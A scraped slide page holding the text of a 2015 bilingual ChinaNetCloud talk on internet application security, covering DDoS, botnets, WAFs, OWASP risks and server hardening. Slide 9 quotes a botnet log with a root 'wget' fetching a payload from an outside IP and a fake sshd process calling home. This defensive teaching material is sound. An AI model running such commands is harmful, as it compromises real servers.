Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲ChinaNetCloud
 
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in ChinaChinaNetCloud
 
AWS Summit OaaS Talk by ChinaNetCloud
AWS Summit OaaS Talk by ChinaNetCloudAWS Summit OaaS Talk by ChinaNetCloud
AWS Summit OaaS Talk by ChinaNetCloudChinaNetCloud
 
Running Internet Systems in China - The Details You Need to Succeed in Chines...
Running Internet Systems in China - The Details You Need to Succeed in Chines...Running Internet Systems in China - The Details You Need to Succeed in Chines...
Running Internet Systems in China - The Details You Need to Succeed in Chines...ChinaNetCloud
 
Making Internet Operations Easier
Making Internet Operations EasierMaking Internet Operations Easier
Making Internet Operations EasierChinaNetCloud
 
Big Data Security (ChinaNetCloud - Guiyang Conference)
Big Data Security (ChinaNetCloud - Guiyang Conference)Big Data Security (ChinaNetCloud - Guiyang Conference)
Big Data Security (ChinaNetCloud - Guiyang Conference)ChinaNetCloud
 
Why Work at ChinaNetCloud
Why Work at ChinaNetCloudWhy Work at ChinaNetCloud
Why Work at ChinaNetCloudChinaNetCloud
 
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco eventCloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco eventChinaNetCloud
 
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维ChinaNetCloud
 
ChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - Public Clouds in China OverviewChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - Public Clouds in China OverviewChinaNetCloud
 
ChinaNetCloud - China Internet Infrastructure Summary
ChinaNetCloud - China Internet Infrastructure SummaryChinaNetCloud - China Internet Infrastructure Summary
ChinaNetCloud - China Internet Infrastructure SummaryChinaNetCloud
 
Linux Memory Basics for SysAdmins - ChinaNetCloud Training
Linux Memory Basics for SysAdmins - ChinaNetCloud TrainingLinux Memory Basics for SysAdmins - ChinaNetCloud Training
Linux Memory Basics for SysAdmins - ChinaNetCloud TrainingChinaNetCloud
 
Networking Layer Basics - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud TrainingNetworking Layer Basics - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud TrainingChinaNetCloud
 
ChinaNetCloud Training - iptables Intro
ChinaNetCloud Training - iptables IntroChinaNetCloud Training - iptables Intro
ChinaNetCloud Training - iptables IntroChinaNetCloud
 
ChinaNetCloud Training - HAProxy Intro
ChinaNetCloud Training - HAProxy IntroChinaNetCloud Training - HAProxy Intro
ChinaNetCloud Training - HAProxy IntroChinaNetCloud
 

Plus de ChinaNetCloud (20)

AWS ELB Tips & Best Practices
AWS ELB Tips & Best PracticesAWS ELB Tips & Best Practices
AWS ELB Tips & Best Practices
 
OpsStack--Integrated Operation Platform
OpsStack--Integrated Operation PlatformOpsStack--Integrated Operation Platform
OpsStack--Integrated Operation Platform
 
ChinaNetCloud Online Lecture:Something About Tshark
ChinaNetCloud Online Lecture:Something About TsharkChinaNetCloud Online Lecture:Something About Tshark
ChinaNetCloud Online Lecture:Something About Tshark
 
Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Steve Mushero on Entrepreneurship - 创业 - 崔牛会Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Steve Mushero on Entrepreneurship - 创业 - 崔牛会
 
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
 
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
 
AWS Summit OaaS Talk by ChinaNetCloud
AWS Summit OaaS Talk by ChinaNetCloudAWS Summit OaaS Talk by ChinaNetCloud
AWS Summit OaaS Talk by ChinaNetCloud
 
Running Internet Systems in China - The Details You Need to Succeed in Chines...
Running Internet Systems in China - The Details You Need to Succeed in Chines...Running Internet Systems in China - The Details You Need to Succeed in Chines...
Running Internet Systems in China - The Details You Need to Succeed in Chines...
 
Making Internet Operations Easier
Making Internet Operations EasierMaking Internet Operations Easier
Making Internet Operations Easier
 
Big Data Security (ChinaNetCloud - Guiyang Conference)
Big Data Security (ChinaNetCloud - Guiyang Conference)Big Data Security (ChinaNetCloud - Guiyang Conference)
Big Data Security (ChinaNetCloud - Guiyang Conference)
 
Why Work at ChinaNetCloud
Why Work at ChinaNetCloudWhy Work at ChinaNetCloud
Why Work at ChinaNetCloud
 
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco eventCloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
 
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
 
Clouds in China
Clouds in ChinaClouds in China
Clouds in China
 
ChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - Public Clouds in China OverviewChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - Public Clouds in China Overview
 
ChinaNetCloud - China Internet Infrastructure Summary
ChinaNetCloud - China Internet Infrastructure SummaryChinaNetCloud - China Internet Infrastructure Summary
ChinaNetCloud - China Internet Infrastructure Summary
 
Linux Memory Basics for SysAdmins - ChinaNetCloud Training
Linux Memory Basics for SysAdmins - ChinaNetCloud TrainingLinux Memory Basics for SysAdmins - ChinaNetCloud Training
Linux Memory Basics for SysAdmins - ChinaNetCloud Training
 
Networking Layer Basics - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud TrainingNetworking Layer Basics - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud Training
 
ChinaNetCloud Training - iptables Intro
ChinaNetCloud Training - iptables IntroChinaNetCloud Training - iptables Intro
ChinaNetCloud Training - iptables Intro
 
ChinaNetCloud Training - HAProxy Intro
ChinaNetCloud Training - HAProxy IntroChinaNetCloud Training - HAProxy Intro
ChinaNetCloud Training - HAProxy Intro
 

Internet System Security Overview

  • 1. Internet Application Security Securing Your System 让应用的安全加固您的系统 By Steve Mushero April, 2015 Build & Manage Servers Optimize & Manage Servers Manage Cloud Servers Copyright © 2015 ChinaNetCloud
  • 2. Running the World’s Internet Servers www.ChinaNetCloud.com Big Exciting Internet 令人激动的互联网 0 500 1,000 1,500 2,000 2,500 3,000 3,500 1994 1996 1998 2000 2002 2004 2006 2008 2010 2012 2014* Internet Users (in millions) Source: Internet Live Stats Note: * estimate for July 1, 2014. Growth in percentages 80% 76% 73% 56% 49% 47%
  • 3. Running the World’s Internet Servers www.ChinaNetCloud.com Use every day for everything 每一天,时刻陪伴
  • 4. Running the World’s Internet Servers www.ChinaNetCloud.com For Every Part of Life 融入生活的每一部分
  • 5. Running the World’s Internet Servers www.ChinaNetCloud.com But not everything is happy 但,不是诸事如意
  • 6. Running the World’s Internet Servers www.ChinaNetCloud.com Today’s Three Security Problems 当今三大安全问题 • DDoS • Steal Data 数据盗窃 • Botnets 僵尸网络
  • 7. Running the World’s Internet Servers www.ChinaNetCloud.com Security Problem #1 – DDoS 第一安全问题-DDoS • For Fun 捣蛋 • Get Money 赚钱 • Competitors 竞争
  • 8. Running the World’s Internet Servers www.ChinaNetCloud.com Security Problem #2 – Stealing Data 第二安全问题-数据盗窃 • Steal Money 偷钱 • Steal/Sell Data 偷数据 • Steal Code 偷代码
  • 9. Running the World’s Internet Servers www.ChinaNetCloud.com Security Problem #3 – BotNets 第三安全问题-僵尸网络 • Break In 攻入 • Install Root Kit 安装 • Call home for control 呼叫 • Do evil 作恶 Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)
  • 10. Running the World’s Internet Servers www.ChinaNetCloud.com Where is Operations & Security ? Duang – 运维和安全在哪里 ?
  • 11. Running the World’s Internet Servers www.ChinaNetCloud.com Our Job is to Serve & Protect 我们的职责就是安全代维
  • 12. Running the World’s Internet Servers www.ChinaNetCloud.com Security is Secondary, Not Important 安全是次要的 Features - 特点 Performance - 性能 Convenience - 便捷 Security 安全
  • 13. Running the World’s Internet Servers www.ChinaNetCloud.com But becoming more important 但逐渐重要 P2P Lending金融 E-Commerce SaaSFeatures - 特点 Performance - 性能 Convenience - 便捷 Security 安全
  • 14. Running the World’s Internet Servers www.ChinaNetCloud.com How to be Secure ? 如何安全加固
  • 15. Running the World’s Internet Servers www.ChinaNetCloud.com What is the most Secure Application? 什么是最安全的应用
  • 16. Running the World’s Internet Servers www.ChinaNetCloud.com Lots of pieces 很多方面 • Internet – 互联网 • Firewalls - 防火墙 • Web/App Servers - 服务器 • Database - 数据库 • OS - 操作系统 • Servers /Cloud - 物理机/云
  • 17. Running the World’s Internet Servers www.ChinaNetCloud.com 4 Security Zones 4大安全区域 Internet 互联网 In Front of Your Application 应用之上 Inside Your App 应用之内 Under Your App 应用之下
  • 18. Running the World’s Internet Servers www.ChinaNetCloud.com Zone: Internet 互联网 Internet 互联网 In Front of Your Application Inside Your Application Under Your Application
  • 19. Running the World’s Internet Servers www.ChinaNetCloud.com DDoS Attacks DDoS 攻击
  • 20. Running the World’s Internet Servers www.ChinaNetCloud.com DDoS Type 1 – Overload Bandwidth 第一种类型-带宽超载
  • 21. Running the World’s Internet Servers www.ChinaNetCloud.com DDoS Type 2 – Overload Servers 第二种类型-服务器超载
  • 22. Running the World’s Internet Servers www.ChinaNetCloud.com DDoS – Solutions 防DDoS策略 • Cloud Filtering – Anquanbao 安全宝 • CDN Support -CDN支持 • IDC Hardware -IDC 硬件 • Front of Application Blocking 在应用之前阻断 • Complex & Difficult - 复杂而困难 • In Application Mitigation 在应用之内缓解 • Caching - 缓存
  • 23. Running the World’s Internet Servers www.ChinaNetCloud.com Zone: In Front of Your Application 应用之上 Internet In Front of Your Application 应用之上 Inside Your Application Under Your Application
  • 24. Running the World’s Internet Servers www.ChinaNetCloud.com Zone: In Front of Your Application 应用之上
  • 25. Running the World’s Internet Servers www.ChinaNetCloud.com Firewalls – Traditional 防火墙 – 传统 • Required – Basic protection 要求-基本的保护 • Basic filtering 基本的过滤 • NAT inbound • ssh, monitoring • NAT outbound • Backups, DNS, ntp, updates
  • 26. Running the World’s Internet Servers www.ChinaNetCloud.com WAF – Web App Firewall WAF – 网页应用防火墙 • Increasingly Required 上升的需求 • More Advanced 更加先进 • More Complex 更加复杂 • Can break your Application 会影响应用 • Hard to Manage 难以管理 • Hard to Monitor 难以监控 • Different Types 多种类型 • Patterns vs. Heuristics 安全宝
  • 27. Running the World’s Internet Servers www.ChinaNetCloud.com WAF – Web App Firewall WAF – 网页应用防火墙 • Two key protections 两种主要的防护 • Protect Application Code 保护应用代码 • OWASP basics • SQL, XSS • DDoS Filtering & Limiting 过滤和限制 • IP, agent, url, session
  • 28. Running the World’s Internet Servers www.ChinaNetCloud.com WAF – Web App Firewall - Types WAF-网页应用防火墙-类型 • Dedicated Hardware 专有硬件设备 • Palo Alto Networks • Software / Virtual 软件/虚拟服务 • Anquanbao - 安全宝 • Aliyun Cloud Shell - 云盾 • Software Module 软件模块 • modSecurity 安全宝
  • 29. Running the World’s Internet Servers www.ChinaNetCloud.com Zone: Inside Your Application 在应用之内 Internet Inside Your Application 在应用之内 Under Your Application In Front of Your Application
  • 30. Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 Main App Security Problem ? APP主要应用安全的问题是什么?
  • 31. Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 Inside YOUR Application 在你的应用里面
  • 32. Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 Your Code 你的代码
  • 33. Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 怎么办?
  • 34. Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 Write secure code 写安全的代码
  • 35. Running the World’s Internet Servers www.ChinaNetCloud.com Secure Code – Difficult & Frustrating 安全代码 – 又难又麻烦
  • 36. Running the World’s Internet Servers www.ChinaNetCloud.com Code – OWASP Project Resources 代码 – OWASP 项目资源 • Info - 介绍 • Guides - 指引 • Tools - 工具 http://owasp.org.cn
  • 37. Running the World’s Internet Servers www.ChinaNetCloud.com Code – OWASP Top 10 代码-10大应用程序风险 Key Points要点 • A1 – Injection • A2 – Auth & Session Mgmt • A3 – XSS • A7 – Function ACLs • A8 – CSRF • A9 – Insecure Components http://owasp.org.cn
  • 38. Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application – App Scanning 在应用之内-APP扫描 • Best practice 最佳实践 • Find new problems 找到新问题 • As you update 更新 • Third parties 第三方 • New exploits 新的改进
  • 39. Running the World’s Internet Servers www.ChinaNetCloud.com Zone: Under Your Application 在应用之下 Internet Under Your Application 在应用之下 In Front of Your Application Inside Your Application
  • 40. Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application ? 在应用之下 什么意思?
  • 41. Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Cloud & Servers 在应用之下-云 & 物理服务器 • Services • Servers & OS • Cloud • Network • 服务软件 • 服务器和操作系统 • 云 • 网络
  • 42. Running the World’s Internet Servers www.ChinaNetCloud.com Cloud & Servers – Love & Respect Them 在应用之下-需要被关注 • Often forgotten 经常被遗忘 • Often use defaults 经常采取默认设置 • Or random Google search 或用谷歌搜索配置 • Source of great danger 风险的发源地
  • 43. Running the World’s Internet Servers www.ChinaNetCloud.com Services – Web Servers 服务-网页服务器 • Best practices 最佳实践 • Lots of small issues 许多细小问题 • Running user - 用户运行 • File permissions - 文件许可 • Dangerous uploads - PHP inside JPEGs ! 危险的上传 • SSL – Heartbleed, etc.
  • 44. Running the World’s Internet Servers www.ChinaNetCloud.com Services – App Servers 服务-APP服务器 • Best Practices 最佳实践 • Delete example APPs 删除样例 • Delete tools (Tomcat) 删除工具 • Patch Software (Java!) 软件补丁
  • 45. Running the World’s Internet Servers www.ChinaNetCloud.com Services – Database Servers 服务- 数据库服务器 • Use Best Practices 最佳实践 • Secure Configuration 安全配置 • Limited User Permission 限制用户许可 • Separate App & DBA User 区分APP和DBA用户
  • 46. Running the World’s Internet Servers www.ChinaNetCloud.com Services – Database Servers 服务- 数据库服务器 • Separate User for each App 区分每个APP的用户 • Safe File Permissions 安全的文件许可 • Log SQL if possible 尽可能记录SQL
  • 47. Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Server & OS 应用之下-服务器&操作系统 • Hardened OS 加固 • Iptables 防火墙 • Run Users 用户运行 • File permissions 文件许可
  • 48. Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Server & OS 应用之下-服务器&操作系统 • Logging 日志 • Scanning (ClamAV) 扫描 • Track activity 轨迹追踪 • Automate 自动 • System Updates 系统升级
  • 49. Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Cloud 应用之下-云 • Best Practices 最佳实践 • Control Access 控制登录权限 • Can delete EVERYTHING 会被意外删除
  • 50. Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Cloud 应用之下-云 • Separate Backups 备份隔离 • Out of Cloud 在云之外 • MFA Delete on AWS • AWS上删除MFA
  • 51. Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Network 应用之下-网络 • Generally okay, BUT • VPC on Clouds – Separate 使用公共云上隔离的私有网络 • Consider Out-of-Band Link (DDoS) 考虑带外数据链接
  • 52. Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Network 应用之下-网络 • Firewalls – Front & Middle 防火墙-前端&中间 • Secure Configuration 安全配置 • Separate test/dev network 区分测试/开发
  • 53. Running the World’s Internet Servers www.ChinaNetCloud.com Backups as Security 备份即安全 • Backups ARE part of Security 备份属于安全管理的范畴 • If all else fails, use backups 若发生意外,使用备份 • Keep them Secure 安全备份 • Avoid Theft & Tampering 防止盗窃或恶意企图 • Read-Only is Best 最好采用只读
  • 54. Running the World’s Internet Servers www.ChinaNetCloud.com Security Monitoring 安全监控
  • 55. Running the World’s Internet Servers www.ChinaNetCloud.com Audit is also Important 审计也很重要 Deep Check to Find Problems 深入检查,发现问题
  • 56. Running the World’s Internet Servers www.ChinaNetCloud.com Summary 总结 • Security is Critically Important 安全非常重要 • Increasingly Important 并且,越来越重要 • Getting Harder 但也,越来越难 • But more Tools 但,实用工具越来越多 • Details & Experts Help 注重细节,并且需要专家帮助!
  • 57. Running the World’s Internet Servers www.ChinaNetCloud.com How can ChinaNetCloud help ? 云络怎么帮您?
  • 58. Running the World’s Internet Servers www.ChinaNetCloud.com We Manage All of this for you 我们为你管理好一切 • Deep Experience 丰富经验 • Experts at Every Level 全面专业 • Part of Overall Operations 是运维工作的一部分
  • 59. Running the World’s Internet Servers www.ChinaNetCloud.com Thank you! 谢谢
  • 60. Running the World’s Internet Servers www.ChinaNetCloud.com Thanks from ChinaNetCloud 来自云络的感谢 Pioneers in OaaS – Operations as a Service 运维即服务的先锋团队
  • 61. ChinaNetCloud Sales@ChinaNetCloud.com www.ChinaNetCloud.com Beijing Office: 北京办公室 Lee World Business Building #305 57 Happiness Village Road, Chaoyang District 朝阳区幸福村中路57号利世商务楼305室 Beijing, 100027 China Silicon Valley Office: 硅谷办公室 California Avenue Palo Alto, 94123 USA Shanghai Headquarters: 上海办公室 X2 Space 1-601, 1238 Xietu Lu Shanghai, 200032 China 斜土路1238号X2空间1号楼601室 T: +86-21-6422-1946 F: +86-21-6422-4911